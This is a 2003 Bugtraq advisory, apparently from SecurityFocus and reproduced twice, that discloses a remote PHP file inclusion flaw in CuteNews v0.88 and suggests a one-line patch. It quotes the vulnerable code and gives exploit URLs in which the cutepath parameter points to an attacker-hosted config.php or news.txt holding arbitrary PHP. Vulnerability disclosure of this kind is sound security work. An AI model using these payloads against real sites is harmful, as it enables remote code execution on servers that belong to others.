Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
PHP code injection in CuteNews
Feb 25 2003 11:31AM
Over_G (overg mail ru)
PHP source code injection in CuteNews
Informations :
===============================================
Script : CuteNews v0.88
Offical site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :
if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :
require_once("$cutepath/config.php");
===============================================
comments.php :
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt
Content config.php or news.txt:
Any PHP Code.
===============================================
Patch :
Replace
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
on $cutepath=".";
===============================================
Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG (at) mail (dot) ru [email concealed] VenoM88 (at) mail (dot) ru [email concealed]
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Informations :
===============================================
Script : CuteNews v0.88
Offical site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :
if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :
require_once("$cutepath/config.php");
===============================================
comments.php :
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt
Content config.php or news.txt:
Any PHP Code.
===============================================
Patch :
Replace
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
on $cutepath=".";
===============================================
Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG (at) mail (dot) ru [email concealed] VenoM88 (at) mail (dot) ru [email concealed]
[ reply ]